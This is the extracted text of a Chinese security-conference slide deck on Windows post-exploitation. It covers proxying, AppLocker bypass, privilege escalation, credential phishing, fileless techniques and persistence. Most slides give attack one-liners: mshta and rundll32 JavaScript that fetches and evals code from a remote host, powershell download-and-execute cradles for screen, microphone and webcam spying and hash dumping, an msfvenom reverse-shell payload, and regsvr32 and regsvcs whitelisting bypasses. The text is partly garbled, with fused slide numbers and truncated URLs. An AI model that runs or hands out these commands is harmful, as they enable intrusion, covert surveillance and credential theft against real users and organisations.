1、12Shell is Only the Beginning后渗透阶段的攻防对抗3gstudent&Evi1cg22As a offensive researcher,if you can dream it,someone has likelyalready done it and that someone isnt the kind ofperson who speaks at security consMatt Graeber323gstudentGood StudyGood HealthGood Attitude 42Evi1cgThinWhiteHatSecurity Researche
2、r52后渗透阶段渗透测试以特定的业务系统作为目标,识别出关键的基础设施,并寻找客户组织最具价值和尝试进行安全保护的信息和资产黑客攻击黑客对攻击战果进一步扩大,以及尽可能隐藏自身痕迹的过程62打开一扇窗Open Proxy绕过看门狗我来作主人Bypass Application Whitelisting Escalate Privileges屋里有什么Gather Information我来抓住你Detection and Mitigations挖一个密道Persistence目录72打开一扇窗Open Proxy82为什么用代理?更好地接触到目标所处环境 使用已有shell的机器作为跳板,扩大
3、战果 Its the beginning92常用方法端口转发:Client-Lcx,Netsh;HTTP-Tunnel;Metasploit-PortpwdHTTP-ReGeorg;Metasploit-Socks4aSocks代理:Client-Ew,Xsocks;其他:SSH,ICMP 等Vpn102!然而,我们可能会碰到这样的情况:安装杀毒软件,拦截“恶意”程序 设置应用程序白名单,限制白名单以外的程序运行eg:Windows Applocker112Windows AppLocker简介:即“应用程序控制策略”,可用来对可执行程序、安装程序和脚本进行控制开启默认规则后,除了默认路径可以
4、执行外,其他路径均无法执行程序和脚本122绕过看门狗Bypass Application Whitelisting132绕过思路 Hta Office Macro Cpl Chm Powershell Rundll32 Regsvr32 Regsvcs Installutil1421、HtaMore:Mshta.exevbscript:CreateObject(Wscript.Shell).Run(calc.exe,0,true)(window.close)Mshta.exe javascript:.mshtml,RunHTMLApplication;document.write();h=ne
5、w%20ActiveXObject(WScript.Shell).run(calc.exe,0,true);tryh.Send();b=h.ResponseText;eval(b);catch(e)new%20ActiveXObject(WScript.Shell).Run(cmd /c taskkill /f /immshta.exe,0,true);1522、Office MacroMacroRaptor:Detect malicious VBA Macros Python https:/bitbucket.org/decalage/oletools/wiki/mraptor1623、Cp
6、lDLL/CPL:生成Payload.dll:msfvenom-p windows/meterpreter/reverse_tcp-B x00 xff lhost=192.168.127.132 lport=8888-f dll-o payload.dll(1)直接运行dll:rundll32 shell32.dll,Control_RunDLL payload.dll(2)将dll重命名为cpl,双击运行(3)普通的dll直接改后缀名From:http:/drops.wooyun.org/tips/160421724、Chm高级组合技打造“完美”捆绑后门:http:/drops.wooyun
7、.org/tips/14254利用系统CHM文件实现隐蔽后门:那些年我们玩过的奇技淫巧1825、PowershellCommand:powershell-nop-exec Bypass-c IEX(New-OBjectet.WeBClient).DownloadString(http:/ip:port/)Get-Content payload.ps1|iex cmd.exe/K key.snk$key=BwIAAAAkAABSU0EyAAQAAAEAAQBhXtvkSeH85E31z64cAX+X2PWGc6DHP9VaoD13CljtYau9SesUzKVLJdHphY5ppg5clHIGa
8、L7nZBp6qukLH0lLEq/vW979GWzVAgSZaGVCFpuk6p1y69cSr3STlzljJrY76JIjeS4+RhBdWHp99y8QhwRllOC0qu/WxZaffHS2te/PKzIiTuFfcP46qxQoLR8s3QZhAJBnn9TGJkBix8MTgEt7hD1DC2hXv7dKaC531ZWqGXB54OnuvFBD5P2t+vyvZuHNmAy3pX0BDXqwEfoZZ+hiIk1YUDSNOE79zwnpVP1+BN0PK5QCPCS+6zujfRlQpJ+nfHLLicweJ9uT7OG3g/P+JpXGN0/+Hitolufo7Ucjh+WvZ
9、AU/dzrGny5stQtTmLxdhZBOsNDJpsqnzwEUfL5+o8OhujBHDm/ZQ0361mVsSVWrmgDPKHGGRx+7FBdgpBEq3m15/4zzg343V9NBwt1+qZU+TSVPU0wRvkWiZRerjmDdehJIBoWsx4V8aiWx8FPPngEmNz89tBAQ8zBIrJFfmtYnj1fFmkNu3lglOefcacyYEHPX/tqcBuBIg/cpcDHps/6SGCCciX3tufnEeDMAQjmLku8X4zHcgJx6FpVK7qeEuvyV0OGKvNor9B/WKQHIHjkzG+z6nWHMoMYV5VMTZ0jLM
10、5aZQ6ypwmFZaNmtL6KDzKv8L1YN2TkKjXEoWulXNliBpelsSJyuICplrCTPGGSxPGihT3rpZ9tBLZUefrFnLNiHfVjNi53Yg4=$Content=System.Convert:FromBase64String($key)Set-Content key.snk-Value$Content-Encoding Byte编译:C:WindowsMicrosoft.NETFrameworkv4.0.30319csc.exe /r:System.EnterpriseServices.dll/target:liBrary/out:Regas
11、m.dll/keyfile:key.snk Regasm.cs运行:C:WindowsMicrosoft.NETFrameworkv4.0.30319regsvcs.exe Regasm.dllORC:WindowsMicrosoft.NETFrameworkv4.0.30319regasm.exe Regasm.dll/如果没有管理员权限使用/U来运行C:WindowsMicrosoft.NETFrameworkv4.0.30319regsvcs.exe /U Regasm.dllC:WindowsMicrosoft.NETFrameworkv4.0.30319regasm.exe/U Re
12、gasm.dllFrom:https:/gist.githuB.com/suBTee/e1c54e1fdafc15674c9a2229、InstallutilInstallUtil:编译:C:WindowsMicrosoft.NETFramework64v4.0.30319csc.exe/unsafe/platform:x64/out:InstallUtil.exe InstallUtil.cs编译以后用/U参数运行:C:WindowsMicrosoft.NETFramework64v4.0.30319InstallUtil.exe/U InstallUtil.exeFrom:http:/su
13、Bt0 x10.Blogspot.jp/2015/08/application-whitelisting-Bypasses-101.html http:/drops.wooyun.org/tips/886223210、可执行目录通过ps脚本扫描可写入的路径,脚本下载地址:http:/go.mssec.se/AppLockerBCFrom:http:/drops.wooyun.org/tips/1180424211、最直接的方式提权252我来作主人Escalate Privileges262常见的提权方式 本地提权漏洞 服务提权 协议 Phishing272本地提权根据补丁号来确定是否存在漏洞的
14、脚本:https:/githuB.com/GDSSecurity/Windows-Exploit-Suggester将受害者计算机systeminfo导出到文件:Systeminfo 1.txt使用脚本判断存在的漏洞:python windows-exploit-suggester.py-dataBase 2016-05-31-mssB.xls-systeminfo/Desktop/1.txt282可能遇到的问题Exp被杀!将Exp改成Powershell:http:/evi1cg.me/archives/MS16-032-Windows-Privilege-Escalation.html29
15、2Demo Time302312服务提权常用服务:Mssql,Mysql,Oracle,Ftp第三方服务:Dll劫持,文件劫持提权脚本Powerup:http:/drops.wooyun.org/tips/11989322协议提权利用已知的Windows中的问题,以获得本地权限提升 -Potato其利用NTLM中继(特别是基于HTTP SMB中继)和NBNS欺骗进行提权。详情:http:/tools.pwn.ren/2016/01/17/potato-windows.html332PhishingMSF Ask模块:exploit/windows/local/ask通过runas方式来诱导用户
16、通过点击uac验证来获取最高权限。需要修改的msf脚本metasploit/lib/msf/core/post/windows/runas.rb342Phishing Demo352362屋里有什么Gather Information372Gather Information成为了主人,或许我们需要看看屋里里面有什么?两种情况:1:已经提权有了最高权限,为所欲为2:未提权,用户还有UAC保护,还不能做所有的事情382Bypass UAC常用方法:使用IFileOperation COM接口 使用Wusa.exe的extract选项 远程注入SHELLCODE 到傀儡进程 DLL劫持,劫持系统的
17、DLL文件 直接提权过UAC Phishinghttp:/evi1cg.me/archives/Powershell_Bypass_UAC.html http:/ Tips通过脚本弹出认证窗口,让用户输入账号密码,由此得到用户的明文密码。powershell脚本如下:From:https:/ TipsMSF模块post/windows/gather/phish_windows_credentials422更多参考Installed ProgramsStartup ItemsInstalled ServicesFile/Printer Shares DatabaseServersCertific
18、ate AuthoritySecurity ServicesSensitive DataKey-loggingScreen captureNetwork traffic captureUser InformationSystem ConfigurationPassword PolicySecurity PoliciesConfigured Wireless Networks and Keys432新的攻击方法无文件442无文件姿势之(一)-Powershell屏幕监控:powershell -nop -exec bypass -c “IEX (New-Object Net.WebClient)
19、.DownloadString(http:/evi1cg.me/powershell/Show-TargetScreen.ps1);Show-TargetScreen”录音:powershell -nop -exec bypass -c “IEX (New-Object Net.WebClient).DownloadString(https:/ -Path$env:TEMPsecret.wav -Length 10 -Alias SECRET”摄像头监控:powershell -nop -exec bypass -c “IEX (New-Object Net.WebClient).Downlo
20、adString(https:/ -RecordTime 2 -Path$env:temphack.avi”-Path$env:temphack.avi”抓Hash:powershell IEX (New-Object Net.WebClient).DownloadString(https:/ IEX (New-Object Net.WebClient).DownloadString(https:/ javascript:.mshtml,RunHTMLApplication;document.write();h=new%20ActiveXObject(WinHttp.WinHttpReques
21、t.5.1);h.Open(GET,http:/127.0.0.1:8081/connect,false);tryh.Send();b=h.ResponseText;eval(b);catch(e)new%20ActiveXObject(WScript.Shell).Run(cmd /c taskkill /f /im rundll32.exe,0,true);From:JavaScript Backdoor http:/drops.wooyun.org/tips/11764JavaScript Phishing http:/drops.wooyun.org/tips/12386472无文件姿
22、势之(三)-mshta启动JsRat:Mshta javascript:.mshtml,RunHTMLApplication;document.write();h=new%20ActiveXObject(WinHttp.WinHttpRequest.5.1);h.Open(GET,http:/192.168.2.101:9998/connect,false);tryh.Send();b=h.ResponseText;eval(b);catch(e)new%20ActiveXObject(WScript.Shell).Run(cmd /c taskkill /f /immshta.exe,0,t
23、rue);482无文件姿势之(四)-sctSCT:regsvr32 /u /sCalc.sct/i:http:/urlto/calc.sct scrobj.dllFrom:Use SCT to Bypass Application Whitelisting Protection http:/drops.wooyun.org/tips/15124492无文件姿势之(五)-wscWsc:rundll32.exejavascript:.mshtml,RunHTMLApplicationCalc.wsc;document.write();GetObject(script:http:/urlto/cal
24、c.wsc)From:WSC、JSRAT and WMI Backdoor http:/drops.wooyun.org/tips/15575502Demo Time512522挖一个密道Persistence532常见方法启动项注册表wmiatschtasks利用已有的第三方服务542新方法Bitsadmin:需要获得管理员权限 可开机自启动、间隔启动 适用于Win7 、Win8、Server 2008及以上操作系统 可绕过Autoruns对启动项的检测 已提交至MSRC(Microsoft Security Response Center)552Demo Time562572我来抓住你De
25、tection and Mitigations582Detection and Mitigations bitsadmin /list /allusers /verbose Stop Background Intelligent Transfer Service592Detection and Mitigations602关注drops612Special thanks toCasey Smith subTee622Reference1、Shell is Only the Beginning quote from Carlos Perezs Bloghttp:/ Graebers idea quote fromhttps:/
